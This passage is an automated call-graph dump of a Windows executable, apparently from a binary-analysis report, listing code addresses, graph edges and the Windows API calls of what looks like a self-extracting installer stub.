2609->2610 2611 7ff7e74f8006 CharNextA 2609->2611 2610->2609 2611->2608 2611->2609 2613 7ff7e74f7e28 2612->2613 2613->2613 2614 7ff7e74f7e3a 2613->2614 2615 7ff7e74f7e4c CharPrevA 2613->2615 2614->2541 2615->2614 2617 7ff7e74f4f2c 24 API calls 2616->2617 2618 7ff7e74f1be7 2617->2618 2618->2549 2618->2550 2620 7ff7e74f8905 RtlVirtualUnwind 2619->2620 2621 7ff7e74f8947 2619->2621 2620->2621 2624 7ff7e74f8714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2621->2624 2629 7ff7e74f28d5 2625->2629 2633 7ff7e74f2a9a 2625->2633 2627 7ff7e74f2abf GlobalFree 2628 7ff7e74f2aaa 2627->2628 2628->2580 2630 7ff7e74f2908 GetFileVersionInfoSizeA 2629->2630 2629->2633 2636 7ff7e74f2a59 GlobalUnlock 2629->2636 2637 7ff7e74f2a3e GlobalUnlock 2629->2637 2638 7ff7e74f2644 2629->2638 2630->2629 2631 7ff7e74f2926 GlobalAlloc 2630->2631 2631->2628 2632 7ff7e74f2946 GlobalLock 2631->2632 2632->2633 2634 7ff7e74f2961 GetFileVersionInfoA 2632->2634 2633->2627 2633->2628 2634->2629 2635 7ff7e74f2985 VerQueryValueA 2634->2635 2635->2629 2635->2636 2636->2629 2637->2627 2639 7ff7e74f2683 CharUpperA CharNextA CharNextA 2638->2639 2640 7ff7e74f2849 GetSystemDirectoryA 2638->2640 2641 7ff7e74f26c4 2639->2641 2642 7ff7e74f282f GetSystemDirectoryA 2639->2642 2643 7ff7e74f2843 2640->2643 2645 7ff7e74f26ce 2641->2645 2646 7ff7e74f2819 GetWindowsDirectoryA 2641->2646 2642->2643 2644 7ff7e74f7e08 CharPrevA 2643->2644 2647 7ff7e74f286a 2643->2647 2644->2647 2650 7ff7e74f7e08 CharPrevA 2645->2650 2646->2643 2648 7ff7e74f86f0 7 API calls 2647->2648 2649 7ff7e74f2879 2648->2649 2649->2629 2651 7ff7e74f272d RegOpenKeyExA 2650->2651 2651->2643 2652 7ff7e74f2760 RegQueryValueExA 2651->2652 2653 7ff7e74f2806 RegCloseKey 2652->2653 2654 7ff7e74f2793 2652->2654 2653->2643 2655 7ff7e74f279c ExpandEnvironmentStringsA 2654->2655 2656 7ff7e74f27ba 2654->2656 2655->2656 2656->2653 2658 7ff7e74f1185 GetProcAddress 2657->2658 2659 7ff7e74f1229 2657->2659 2660 7ff7e74f11a3 AllocateAndInitializeSid 2658->2660 2661 7ff7e74f121a FreeLibrary 2658->2661 2662 7ff7e74f86f0 7 API calls 2659->2662 2660->2661 2663 7ff7e74f11ec FreeSid 2660->2663 2661->2659 2664 7ff7e74f1238 2662->2664 2663->2661 2664->2589 2664->2595 2667 7ff7e74f51f8 7 API calls 2666->2667 2668 7ff7e74f62af LocalAlloc 2667->2668 2669 7ff7e74f62cd 2668->2669 2670 7ff7e74f62fb 2668->2670 2671 7ff7e74f4f2c 24 API calls 2669->2671 2672 7ff7e74f51f8 7 API calls 2670->2672 2673 7ff7e74f62eb 2671->2673 2674 7ff7e74f630d 2672->2674 2888 7ff7e74f7958 GetLastError 2673->2888 2675 7ff7e74f6311 2674->2675 2676 7ff7e74f634a lstrcmpA 2674->2676 2678 7ff7e74f4f2c 24 API calls 2675->2678 2679 7ff7e74f6364 LocalFree 2676->2679 2680 7ff7e74f637a 2676->2680 2681 7ff7e74f632f LocalFree 2678->2681 2682 7ff7e74f324b 2679->2682 2683 7ff7e74f4f2c 24 API calls 2680->2683 2681->2682 2682->2450 2682->2452 2682->2457 2684 7ff7e74f639c LocalFree 2683->2684 2685 7ff7e74f62f0 2684->2685 2685->2682 2687 7ff7e74f51f8 7 API calls 2686->2687 2688 7ff7e74f61f1 2687->2688 2689 7ff7e74f61f6 2688->2689 2690 7ff7e74f623a 2688->2690 2691 7ff7e74f4f2c 24 API calls 2689->2691 2692 7ff7e74f51f8 7 API calls 2690->2692 2693 7ff7e74f6215 2691->2693 2694 7ff7e74f6253 2692->2694 2695 7ff7e74f326e 2693->2695 2696 7ff7e74f7984 13 API calls 2694->2696 2695->2457 2700 7ff7e74f68f0 2695->2700 2697 7ff7e74f625f 2696->2697 2697->2695 2698 7ff7e74f6263 2697->2698 2699 7ff7e74f4f2c 24 API calls 2698->2699 2699->2693 2701 7ff7e74f51f8 7 API calls 2700->2701 2702 7ff7e74f6932 LocalAlloc 2701->2702 2703 7ff7e74f6982 2702->2703 2704 7ff7e74f6952 2702->2704 2705 7ff7e74f51f8 7 API calls 2703->2705 2706 7ff7e74f4f2c 24 API calls 2704->2706 2707 7ff7e74f6994 2705->2707 2708 7ff7e74f6970 2706->2708 2709 7ff7e74f69d1 lstrcmpA LocalFree 2707->2709 2710 7ff7e74f6998 2707->2710 2913 7ff7e74f7958 GetLastError 2708->2913 2713 7ff7e74f6a63 2709->2713 2714 7ff7e74f6a18 2709->2714 2712 7ff7e74f4f2c 24 API calls 2710->2712 2716 7ff7e74f69b6 LocalFree 2712->2716 2715 7ff7e74f6d40 2713->2715 2718 7ff7e74f6a7b GetTempPathA 2713->2718 2721 7ff7e74f6710 53 API calls 2714->2721 2717 7ff7e74f7d28 28 API calls 2715->2717 2727 7ff7e74f697b 2716->2727 2717->2727 2720 7ff7e74f6a9e 2718->2720 2729 7ff7e74f6ad1 2718->2729 2719 7ff7e74f86f0 7 API calls 2722 7ff7e74f327b 2719->2722 2889 7ff7e74f6710 2720->2889 2724 7ff7e74f6a38 2721->2724 2722->2457 2722->2462 2726 7ff7e74f6a40 2724->2726 2724->2727 2728 7ff7e74f4f2c 24 API calls 2726->2728 2727->2719 2730 7ff7e74f6975 2728->2730 2729->2727 2731 7ff7e74f6b25 GetDriveTypeA 2729->2731 2732 7ff7e74f6d07 GetWindowsDirectoryA 2729->2732 2730->2727 2734 7ff7e74f6b42 GetFileAttributesA 2731->2734 2747 7ff7e74f6b3d 2731->2747 2736 7ff7e74f6f14 38 API calls 2732->2736 2734->2747 2736->2729 2737 7ff7e74f6710 53 API calls 2737->2729 2738 7ff7e74f6b81 GetDiskFreeSpaceA 2740 7ff7e74f6baf MulDiv 2738->2740 2738->2747 2739 7ff7e74f2490 25 API calls 2739->2747 2740->2747 2741 7ff7e74f6c2e GetWindowsDirectoryA 2741->2747 2742 7ff7e74f6f14 38 API calls 2742->2747 2743 7ff7e74f7e08 CharPrevA 2744 7ff7e74f6c56 GetFileAttributesA 2743->2744 2745 7ff7e74f6c6c CreateDirectoryA 2744->2745 2744->2747 2745->2747 2746 7ff7e74f6c99 SetFileAttributesA 2746->2747 2747->2727 2747->2731 2747->2732 2747->2734 2747->2738 2747->2739 2747->2741 2747->2742 2747->2743 2747->2746 2748 7ff7e74f6710 53 API calls 2747->2748 2748->2747 2750 7ff7e74f6f63 GetCurrentDirectoryA SetCurrentDirectoryA 2749->2750 2776 7ff7e74f6f5b 2749->2776 2751 7ff7e74f6f8e 2750->2751 2752 7ff7e74f6fbb GetDiskFreeSpaceA 2750->2752 2756 7ff7e74f4f2c 24 API calls 2751->2756 2753 7ff7e74f6ffc MulDiv 2752->2753 2754 7ff7e74f71da memset 2752->2754 2753->2754 2757 7ff7e74f702a GetVolumeInformationA 2753->2757 2964 7ff7e74f7958 GetLastError 2754->2964 2755 7ff7e74f86f0 7 API calls 2758 7ff7e74f33a1 2755->2758 2759 7ff7e74f6fab 2756->2759 2762 7ff7e74f70c1 SetCurrentDirectoryA 2757->2762 2763 7ff7e74f7062 memset 2757->2763 2758->2457 2758->2469 2945 7ff7e74f7958 GetLastError 2759->2945 2761 7ff7e74f71f2 GetLastError FormatMessageA 2765 7ff7e74f7234 2761->2765 2771 7ff7e74f70e9 2762->2771 2946 7ff7e74f7958 GetLastError 2763->2946 2768 7ff7e74f4f2c 24 API calls 2765->2768 2767 7ff7e74f6fb0 2767->2776 2770 7ff7e74f724f SetCurrentDirectoryA 2768->2770 2769 7ff7e74f707a GetLastError FormatMessageA 2769->2765 2770->2776 2772 7ff7e74f712c 2771->2772 2773 7ff7e74f7150 2771->2773 2774 7ff7e74f4f2c 24 API calls 2772->2774 2773->2776 2947 7ff7e74f2520 2773->2947 2774->2767 2776->2755 2778 7ff7e74f51f8 7 API calls 2777->2778 2779 7ff7e74f5f9b FindResourceA LoadResource LockResource 2778->2779 2780 7ff7e74f61bf 2779->2780 2781 7ff7e74f5fec 2779->2781 2780->2489 2782 7ff7e74f6046 2781->2782 2783 7ff7e74f5ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 2781->2783 2965 7ff7e74f5e44 #20 2782->2965 2783->2782 2786 7ff7e74f604f 2791 7ff7e74f4f2c 24 API calls 2786->2791 2787 7ff7e74f6059 #20 2787->2786 2788 7ff7e74f60c1 #22 2787->2788 2789 7ff7e74f6145 2788->2789 2790 7ff7e74f6105 #23 2788->2790 2793 7ff7e74f6165 2789->2793 2794 7ff7e74f6151 FreeResource 2789->2794 2790->2786 2790->2789 2792 7ff7e74f6143 2791->2792 2792->2789 2795 7ff7e74f618f 2793->2795 2796 7ff7e74f6171 2793->2796 2794->2793 2795->2780 2798 7ff7e74f61a1 SendMessageA 2795->2798 2797 7ff7e74f4f2c 24 API calls 2796->2797 2797->2795 2798->2780 2800 7ff7e74f4208 2799->2800 2803 7ff7e74f421f 2799->2803 2802 7ff7e74f51f8 7 API calls 2800->2802 2801 7ff7e74f4235 memset 2801->2803 2802->2803 2803->2801 2804 7ff7e74f434a 2803->2804 2807 7ff7e74f45e9 2803->2807 2810 7ff7e74f46d3 2803->2810 2811 7ff7e74f43eb CompareStringA 2803->2811 2813 7ff7e74f4694 2803->2813 2816 7ff7e74f51f8 7 API calls 2803->2816 2821 7ff7e74f45da LocalFree 2803->2821 2822 7ff7e74f45a8 LocalFree 2803->2822 2826 7ff7e74f42ed CompareStringA 2803->2826 2842 7ff7e74f448a 2803->2842 2977 7ff7e74f15f4 2803->2977 3016 7ff7e74f1d10 memset memset RegCreateKeyExA 2803->3016 3043 7ff7e74f4838 2803->3043 2805 7ff7e74f4f2c 24 API calls 2804->2805 2841 7ff7e74f4369 2805->2841 2808 7ff7e74f86f0 7 API calls 2807->2808 2809 7ff7e74f45fa 2808->2809 2809->2483 2810->2807 2812 7ff7e74f46ed RegOpenKeyExA 2810->2812 2811->2803 2811->2810 2812->2807 2815 7ff7e74f4722 RegQueryValueExA 2812->2815 2817 7ff7e74f4f2c 24 API calls 2813->2817 2819 7ff7e74f4817 RegCloseKey 2815->2819 2820 7ff7e74f4767 memset GetSystemDirectoryA 2815->2820 2816->2803 2823 7ff7e74f46b3 LocalFree 2817->2823 2819->2807 2824 7ff7e74f47ae 2820->2824 2825 7ff7e74f4798 2820->2825 2821->2807 2822->2803 2822->2810 2823->2807 2829 7ff7e74f10bc _vsnprintf 2824->2829 2828 7ff7e74f7e08 CharPrevA 2825->2828 2826->2803 2828->2824 2830 7ff7e74f47d7 RegSetValueExA 2829->2830 2830->2819 2831 7ff7e74f466f 2833 7ff7e74f4f2c 24 API calls 2831->2833 2832 7ff7e74f449b GetProcAddress 2834 7ff7e74f461c 2832->2834 2832->2842 2837 7ff7e74f4692 2833->2837 2835 7ff7e74f4f2c 24 API calls 2834->2835 2838 7ff7e74f463f FreeLibrary 2835->2838 2839 7ff7e74f464e LocalFree 2837->2839 2838->2839 3069 7ff7e74f7958 GetLastError 2839->3069 2841->2807 2842->2831 2842->2832 2843 7ff7e74f4580 FreeLibrary 2842->2843 2844 7ff7e74f45ce FreeLibrary 2842->2844 3059 7ff7e74f7c50 2842->3059 2843->2822 2844->2821 2846 7ff7e74f51f8 7 API calls 2845->2846 2847 7ff7e74f407b LocalAlloc 2846->2847 2848 7ff7e74f40cd 2847->2848 2849 7ff7e74f409d 2847->2849 2851 7ff7e74f51f8 7 API calls 2848->2851 2850 7ff7e74f4f2c 24 API calls 2849->2850 2852 7ff7e74f40bb 2850->2852 2853 7ff7e74f40df 2851->2853 3107 7ff7e74f7958 GetLastError 2852->3107 2855 7ff7e74f40e3 2853->2855 2856 7ff7e74f4120 lstrcmpA 2853->2856 2857 7ff7e74f4f2c 24 API calls 2855->2857 2858 7ff7e74f413e 2856->2858 2859 7ff7e74f4188 LocalFree 2856->2859 2861 7ff7e74f4101 LocalFree 2857->2861 2862 7ff7e74f7d28 28 API calls 2858->2862 2860 7ff7e74f3261 2859->2860 2860->2450 2860->2457 2861->2860 2863 7ff7e74f415e LocalFree 2862->2863 2863->2860 2864->2485 2866 7ff7e74f79e2 2865->2866 2867 7ff7e74f10bc _vsnprintf 2866->2867 2873 7ff7e74f7a65 FreeResource 2866->2873 2874 7ff7e74f7a1a FreeResource 2866->2874 2868 7ff7e74f7a41 FindResourceA 2867->2868 2869 7ff7e74f79b6 LoadResource LockResource 2868->2869 2870 7ff7e74f7a63 2868->2870 2869->2866 2869->2870 2871 7ff7e74f86f0 7 API calls 2870->2871 2872 7ff7e74f7a90 2871->2872 2872->2473 2873->2870 2874->2866 2876 7ff7e74f51f8 7 API calls 2875->2876 2877 7ff7e74f4a6f LocalAlloc 2876->2877 2878 7ff7e74f4ab1 2877->2878 2879 7ff7e74f4a91 2877->2879 2881 7ff7e74f51f8 7 API calls 2878->2881 2880 7ff7e74f4f2c 24 API calls 2879->2880 2882 7ff7e74f4aaf 2880->2882 2883 7ff7e74f4ac3 2881->2883 2882->2457 2884 7ff7e74f4add lstrcmpA 2883->2884 2885 7ff7e74f4ac7 2883->2885 2884->2885 2886 7ff7e74f4b16 LocalFree 2884->2886 2887 7ff7e74f4f2c 24 API calls 2885->2887 2886->2882 2887->2886 2888->2685 2890 7ff7e74f6742 2889->2890 2892 7ff7e74f6809 2889->2892 2920 7ff7e74f65a8 2890->2920 2931 7ff7e74f6d9c 2892->2931 2893 7ff7e74f6886 2895 7ff7e74f86f0 7 API calls 2893->2895 2898 7ff7e74f68d2 2895->2898 2898->2727 2914 7ff7e74f2490 GetWindowsDirectoryA 2898->2914 2899 7ff7e74f6875 2905 7ff7e74f6f14 38 API calls 2899->2905 2900 7ff7e74f6856 CreateDirectoryA 2903 7ff7e74f6894 2900->2903 2904 7ff7e74f686b 2900->2904 2901 7ff7e74f67a3 GetSystemInfo 2911 7ff7e74f67bd 2901->2911 2902 7ff7e74f67f8 2906 7ff7e74f7e08 CharPrevA 2902->2906 2943 7ff7e74f7958 GetLastError 2903->2943 2904->2899 2907 7ff7e74f6882 2905->2907 2906->2892 2907->2893 2912 7ff7e74f68aa RemoveDirectoryA 2907->2912 2909 7ff7e74f7e08 CharPrevA 2909->2902 2910 7ff7e74f6899 2910->2893 2911->2902 2911->2909 2912->2893 2913->2730 2915 7ff7e74f24ce 2914->2915 2916 7ff7e74f24ec 2914->2916 2917 7ff7e74f4f2c 24 API calls 2915->2917 2918 7ff7e74f86f0 7 API calls 2916->2918 2917->2916 2919 7ff7e74f2507 2918->2919 2919->2729 2919->2737 2922 7ff7e74f65df 2920->2922 2921 7ff7e74f10bc _vsnprintf 2921->2922 2922->2921 2923 7ff7e74f7e08 CharPrevA 2922->2923 2926 7ff7e74f666f GetTempFileNameA 2922->2926 2924 7ff7e74f6640 RemoveDirectoryA GetFileAttributesA 2923->2924 2924->2922 2925 7ff7e74f66df CreateDirectoryA 2924->2925 2925->2926 2927 7ff7e74f66b4 2925->2927 2926->2927 2928 7ff7e74f668f DeleteFileA CreateDirectoryA 2926->2928 2929 7ff7e74f86f0 7 API calls 2927->2929 2928->2927 2930 7ff7e74f66c6 2929->2930 2930->2893 2930->2901 2930->2902 2932 7ff7e74f6db7 2931->2932 2932->2932 2933 7ff7e74f6dc0 LocalAlloc 2932->2933 2934 7ff7e74f6de0 2933->2934 2939 7ff7e74f6e21 2933->2939 2935 7ff7e74f4f2c 24 API calls 2934->2935 2936 7ff7e74f6dfe 2935->2936 2941 7ff7e74f6852 2936->2941 2944 7ff7e74f7958 GetLastError 2936->2944 2937 7ff7e74f7e08 CharPrevA 2940 7ff7e74f6e7f CreateFileA LocalFree 2937->2940 2939->2937 2940->2936 2942 7ff7e74f6ecb CloseHandle GetFileAttributesA 2940->2942 2941->2899 2941->2900 2942->2936 2943->2910 2944->2941 2945->2767 2946->2769 2948 7ff7e74f254d 2947->2948 2949 7ff7e74f258a 2947->2949 2950 7ff7e74f10bc _vsnprintf 2948->2950 2951 7ff7e74f25d3 2949->2951 2952 7ff7e74f258f 2949->2952 2953 7ff7e74f2565 2950->2953 2955 7ff7e74f2585 2951->2955 2959 7ff7e74f10bc _vsnprintf 2951->2959 2954 7ff7e74f10bc _vsnprintf 2952->2954 2956 7ff7e74f4f2c 24 API calls 2953->2956 2958 7ff7e74f25a7 2954->2958 2957 7ff7e74f86f0 7 API calls 2955->2957 2956->2955 2960 7ff7e74f2631 2957->2960 2961 7ff7e74f4f2c 24 API calls 2958->2961 2962 7ff7e74f25ef 2959->2962 2960->2776 2961->2955 2963 7ff7e74f4f2c 24 API calls 2962->2963 2963->2955 2964->2761 2966 7ff7e74f5ed1 2965->2966 2967 7ff7e74f5f46 2965->2967 2968 7ff7e74f55c0 29 API calls 2966->2968 2969 7ff7e74f86f0 7 API calls 2967->2969 2970 7ff7e74f5ee8 2968->2970 2971 7ff7e74f5f5c 2969->2971 2970->2967 2972 7ff7e74f5ef1 #21 2970->2972 2971->2786 2971->2787 2972->2967 2973 7ff7e74f5f0c 2972->2973 2973->2967 2974 7ff7e74f59b0 CloseHandle 2973->2974 2975 7ff7e74f5f2e 2974->2975 2975->2967 2976 7ff7e74f5f33 #23 2975->2976 2976->2967 2978 7ff7e74f1649 2977->2978 3070 7ff7e74f1558 2978->3070 2981 7ff7e74f7e08 CharPrevA 2983 7ff7e74f16dc 2981->2983 2982 7ff7e74f7fb8 2 API calls 2984 7ff7e74f177f 2982->2984 2983->2982 2985 7ff7e74f19d3 2984->2985 2986 7ff7e74f1788 CompareStringA 2984->2986 2987 7ff7e74f7fb8 2 API calls 2985->2987 2986->2985 2988 7ff7e74f17bb GetFileAttributesA 2986->2988 2991 7ff7e74f19e0 2987->2991 2989 7ff7e74f17d5 2988->2989 2990 7ff7e74f19ab 2988->2990 2989->2990 2994 7ff7e74f1558 2 API calls 2989->2994 2995 7ff7e74f4f2c 24 API calls 2990->2995 2992 7ff7e74f1a83 LocalAlloc 2991->2992 2993 7ff7e74f19e9 CompareStringA 2991->2993 2992->2990 2996 7ff7e74f1aa3 GetFileAttributesA 2992->2996 2993->2992 3000 7ff7e74f1a18 2993->3000 2997 7ff7e74f17f9 2994->2997 3014 7ff7e74f18c5 2995->3014 2998 7ff7e74f1ab9 2996->2998 2999 7ff7e74f1823 LocalAlloc 2997->2999 3001 7ff7e74f1558 2 API calls 2997->3001 3015 7ff7e74f1b0c 2998->3015 2999->2990 3002 7ff7e74f1847 GetPrivateProfileIntA GetPrivateProfileStringA 2999->3002 3000->3000 3005 7ff7e74f1a39 LocalAlloc 3000->3005 3001->2999 3006 7ff7e74f1940 3002->3006 3002->3014 3003 7ff7e74f86f0 7 API calls 3004 7ff7e74f1b9e 3003->3004 3004->2803 3005->2990 3009 7ff7e74f1a6a 3005->3009 3007 7ff7e74f1973 3006->3007 3008 7ff7e74f1951 GetShortPathNameA 3006->3008 3013 7ff7e74f10bc _vsnprintf 3007->3013 3008->3007 3011 7ff7e74f10bc _vsnprintf 3009->3011 3011->3014 3012 7ff7e74f1b82 3012->3003 3013->3014 3014->3012 3078 7ff7e74f2ae8 3015->3078 3017 7ff7e74f1db6 3016->3017 3018 7ff7e74f1fff 3016->3018 3021 7ff7e74f10bc _vsnprintf 3017->3021 3024 7ff7e74f1e0d 3017->3024 3019 7ff7e74f86f0 7 API calls 3018->3019 3020 7ff7e74f200e 3019->3020 3020->2803 3022 7ff7e74f1dd6 RegQueryValueExA 3021->3022 3022->3017 3023 7ff7e74f1e2c GetSystemDirectoryA 3022->3023 3025 7ff7e74f7e08 CharPrevA 3023->3025 3024->3023 3026 7ff7e74f1e0f RegCloseKey 3024->3026 3027 7ff7e74f1e50 LoadLibraryA 3025->3027 3026->3018 3028 7ff7e74f1f3b GetModuleFileNameA 3027->3028 3029 7ff7e74f1e6c GetProcAddress FreeLibrary 3027->3029 3031 7ff7e74f1f5e RegCloseKey 3028->3031 3034 7ff7e74f1ece 3028->3034 3029->3028 3030 7ff7e74f1ea4 GetSystemDirectoryA 3029->3030 3032 7ff7e74f1ebb 3030->3032 3030->3034 3031->3018 3033 7ff7e74f7e08 CharPrevA 3032->3033 3033->3034 3034->3034 3035 7ff7e74f1ef7 LocalAlloc 3034->3035 3036 7ff7e74f1f74 3035->3036 3037 7ff7e74f1f1b 3035->3037 3039 7ff7e74f10bc _vsnprintf 3036->3039 3038 7ff7e74f4f2c 24 API calls 3037->3038 3041 7ff7e74f1f39 3038->3041 3040 7ff7e74f1faa 3039->3040 3040->3040 3042 7ff7e74f1fb3 RegSetValueExA RegCloseKey LocalFree 3040->3042 3041->3031 3042->3018 3044 7ff7e74f4874 CreateProcessA 3043->3044 3045 7ff7e74f486d 3043->3045 3046 7ff7e74f49bb 3044->3046 3047 7ff7e74f48ca WaitForSingleObject GetExitCodeProcess 3044->3047 3049 7ff7e74f86f0 7 API calls 3045->3049 3106 7ff7e74f7958 GetLastError 3046->3106 3054 7ff7e74f4901 3047->3054 3051 7ff7e74f4a37 3049->3051 3050 7ff7e74f49c0 GetLastError FormatMessageA 3052 7ff7e74f4f2c 24 API calls 3050->3052 3051->2803 3052->3045 3055 7ff7e74f23c0 19 API calls 3054->3055 3058 7ff7e74f4932 CloseHandle CloseHandle 3054->3058 3057 7ff7e74f4955 3055->3057 3056 7ff7e74f49b2 3056->3045 3057->3058 3058->3045 3058->3056 3060 7ff7e74f7c85 3059->3060 3061 7ff7e74f7e08 CharPrevA 3060->3061 3062 7ff7e74f7cc3 GetFileAttributesA 3061->3062 3063 7ff7e74f7cf6 LoadLibraryA 3062->3063 3064 7ff7e74f7cd9 3062->3064 3066 7ff7e74f7d09 3063->3066 3064->3063 3065 7ff7e74f7cdd LoadLibraryExA 3064->3065 3065->3066 3067 7ff7e74f86f0 7 API calls 3066->3067 3068 7ff7e74f7d19 3067->3068 3068->2842 3069->2841 3071 7ff7e74f1579 3070->3071 3073 7ff7e74f1591 3071->3073 3075 7ff7e74f15c1 3071->3075 3092 7ff7e74f7f48 3071->3092 3074 7ff7e74f7f48 2 API calls 3073->3074 3076 7ff7e74f159f 3074->3076 3075->2981 3075->2983 3076->3075 3077 7ff7e74f7f48 2 API calls 3076->3077 3077->3076 3079 7ff7e74f2d41 3078->3079 3080 7ff7e74f2b1f 3078->3080 3082 7ff7e74f86f0 7 API calls 3079->3082 3080->3079 3081 7ff7e74f2b28 GetModuleFileNameA 3080->3081 3081->3079 3091 7ff7e74f2b50 3081->3091 3083 7ff7e74f2d54 3082->3083 3083->3012 3084 7ff7e74f2b54 IsDBCSLeadByte 3084->3091 3085 7ff7e74f2d13 CharNextA 3088 7ff7e74f2d25 CharNextA 3085->3088 3086 7ff7e74f2b79 CharNextA CharUpperA 3087 7ff7e74f2c6d CharUpperA 3086->3087 3086->3091 3087->3091 3088->3079 3088->3084 3090 7ff7e74f2bbe CharPrevA 3090->3091 3091->3084 3091->3085 3091->3086 3091->3088 3091->3090 3097 7ff7e74f7ea0 3091->3097 3093 7ff7e74f7f60 3092->3093 3094 7ff7e74f7f99 3093->3094 3095 7ff7e74f7f82 CharNextA 3093->3095 3096 7ff7e74f7f6a IsDBCSLeadByte 3093->3096 3094->3071 3095->3093 3096->3093 3096->3094 3098 7ff7e74f7eb8 3097->3098 3098->3098 3099 7ff7e74f7ec1 CharPrevA 3098->3099 3100 7ff7e74f7edd CharPrevA 3099->3100 3101 7ff7e74f7ed5 3100->3101 3102 7ff7e74f7ef4 3100->3102 3101->3100 3103 7ff7e74f7efe CharPrevA 3101->3103 3102->3103 3104 7ff7e74f7f27 3102->3104 3105 7ff7e74f7f15 CharNextA 3102->3105 3103->3104 3103->3105 3104->3091 3105->3104 3106->3050 3107->2860 3109 7ff7e74f23ad 3108->3109 3110 7ff7e74f2349 RegQueryInfoKeyA RegCloseKey 3108->3110 3109->2514 3110->3109 3112 7ff7e74f2271 3111->3112 3113 7ff7e74f22db 3111->3113 3114 7ff7e74f7e08 CharPrevA 3112->3114 3115 7ff7e74f86f0 7 API calls 3113->3115 3116 7ff7e74f2284 WritePrivateProfileStringA _lopen 3114->3116 3117 7ff7e74f22ed 3115->3117 3116->3113 3118 7ff7e74f22b7 _llseek _lclose 3116->3118 3117->2514 3118->3113 3201 7ff7e74f5820 3202 7ff7e74f5881 ReadFile 3201->3202 3203 7ff7e74f584d 3201->3203 3202->3203 3204 7ff7e74f845e 3205 7ff7e74f8478 GetStartupInfoW 3204->3205 3206 7ff7e74f84ab 3205->3206 3207 7ff7e74f84bd 3206->3207 3208 7ff7e74f84da Sleep 3206->3208 3209 7ff7e74f84cd _amsg_exit 3207->3209 3211 7ff7e74f84e7 3207->3211 3208->3206 3209->3211 3210 7ff7e74f8569 _initterm 3213 7ff7e74f8586 _IsNonwritableInCurrentImage 3210->3213 3211->3210 3212 7ff7e74f854a 3211->3212 3211->3213 3214 7ff7e74f866f _ismbblead 3213->3214 3215 7ff7e74f85f4 3213->3215 3214->3213 3216 7ff7e74f2d70 292 API calls 3215->3216 3217 7ff7e74f862f 3216->3217 3218 7ff7e74f8646 3217->3218 3219 7ff7e74f863e exit 3217->3219 3218->3212 3220 7ff7e74f864f _cexit 3218->3220 3219->3218 3220->3212 3221 7ff7e74f831e 3224 7ff7e74f8332 3221->3224 3223 7ff7e74f8399 __set_app_type 3225 7ff7e74f83d6 3223->3225 3228 7ff7e74f8aa8 GetModuleHandleW 3224->3228 3226 7ff7e74f83df __setusermatherr 3225->3226 3227 7ff7e74f83ec 3225->3227 3226->3227 3229 7ff7e74f8abd 3228->3229 3229->3223 3230 7ff7e74f8a1e SetUnhandledExceptionFilter 3231 7ff7e74f351e 3232 7ff7e74f3532 3231->3232 3233 7ff7e74f361c 3231->3233 3237 7ff7e74f3571 GetDesktopWindow 3232->3237 3240 7ff7e74f353f 3232->3240 3234 7ff7e74f3625 SendDlgItemMessageA 3233->3234 3235 7ff7e74f3615 3233->3235 3234->3235 3236 7ff7e74f3560 EndDialog 3236->3235 3238 7ff7e74f4dc8 14 API calls 3237->3238 3239 7ff7e74f3588 6 API calls 3238->3239 3239->3235 3240->3235 3240->3236 3241 7ff7e74f5a1e 3243 7ff7e74f5a28 3241->3243 3242 7ff7e74f5a7d SetFilePointer 3244 7ff7e74f5a3c 3242->3244 3243->3242 3243->3244 3245 7ff7e74f7b0f 3246 7ff7e74f7b5d 3245->3246 3247 7ff7e74f7e08 CharPrevA 3246->3247 3248 7ff7e74f7b95 CreateFileA 3247->3248 3249 7ff7e74f7bd0 3248->3249 3250 7ff7e74f7bde WriteFile 3248->3250 3253 7ff7e74f86f0 7 API calls 3249->3253 3251 7ff7e74f7c02 CloseHandle 3250->3251 3251->3249 3254 7ff7e74f7c35 3253->3254 3119 7ff7e74f58d0 3126 7ff7e74f3c80 3119->3126 3122 7ff7e74f5902 WriteFile 3123 7ff7e74f58fa 3122->3123 3124 7ff7e74f5939 3122->3124 3124->3123 3125 7ff7e74f5965 SendDlgItemMessageA 3124->3125 3125->3123 3127 7ff7e74f3c8c MsgWaitForMultipleObjects 3126->3127 3128 7ff7e74f3d25 3127->3128 3129 7ff7e74f3cb4 PeekMessageA 3127->3129 3128->3122 3128->3123 3129->3127 3130 7ff7e74f3cd9 3129->3130 3130->3127 3130->3128 3131 7ff7e74f3ce7 DispatchMessageA 3130->3131 3132 7ff7e74f3cf8 PeekMessageA 3130->3132 3131->3132 3132->3130 3255 7ff7e74f868e 3256 7ff7e74f86a6 3255->3256 3257 7ff7e74f869d _exit 3255->3257 3258 7ff7e74f86af _cexit 3256->3258 3259 7ff7e74f86bb 3256->3259 3257->3256 3258->3259 3260 7ff7e74f89ce 3261 7ff7e74f8a02 3260->3261 3262 7ff7e74f89df 3260->3262 3262->3261 3263 7ff7e74f89fb ?terminate@ 3262->3263 3263->3261 3264 7ff7e74f3a4e 3265 7ff7e74f3a73 3264->3265 3266 7ff7e74f3b49 3264->3266 3265->3266 3267 7ff7e74f3b51 GetDesktopWindow 3265->3267 3268 7ff7e74f3a88 3265->3268 3269 7ff7e74f3a94 3266->3269 3270 7ff7e74f3c5a EndDialog 3266->3270 3273 7ff7e74f4dc8 14 API calls 3267->3273 3271 7ff7e74f3abb 3268->3271 3272 7ff7e74f3a8c 3268->3272 3270->3269 3271->3269 3276 7ff7e74f3ac5 ResetEvent 3271->3276 3272->3269 3275 7ff7e74f3a9b TerminateThread 3272->3275 3274 7ff7e74f3b6f 3273->3274 3277 7ff7e74f3bdb SetWindowTextA CreateThread 3274->3277 3278 7ff7e74f3b78 GetDlgItem SendMessageA GetDlgItem SendMessageA 3274->3278 3275->3270 3279 7ff7e74f4f2c 24 API calls 3276->3279 3277->3269 3280 7ff7e74f3c28 3277->3280 3278->3277 3283 7ff7e74f3b03 3279->3283 3281 7ff7e74f4f2c 24 API calls 3280->3281 3281->3266 3282 7ff7e74f3b24 SetEvent 3285 7ff7e74f3c80 4 API calls 3282->3285 3283->3282 3284 7ff7e74f3b0c SetEvent 3283->3284 3284->3269 3285->3266 3286 7ff7e74f34ce 3287 7ff7e74f34eb CallWindowProcA 3286->3287 3288 7ff7e74f34dc 3286->3288 3289 7ff7e74f34e7 3287->3289 3288->3287 3288->3289 3290 7ff7e74f874b RtlCaptureContext RtlLookupFunctionEntry 3291 7ff7e74f8795 RtlVirtualUnwind 3290->3291 3292 7ff7e74f87d7 3290->3292 3291->3292 3295 7ff7e74f8714 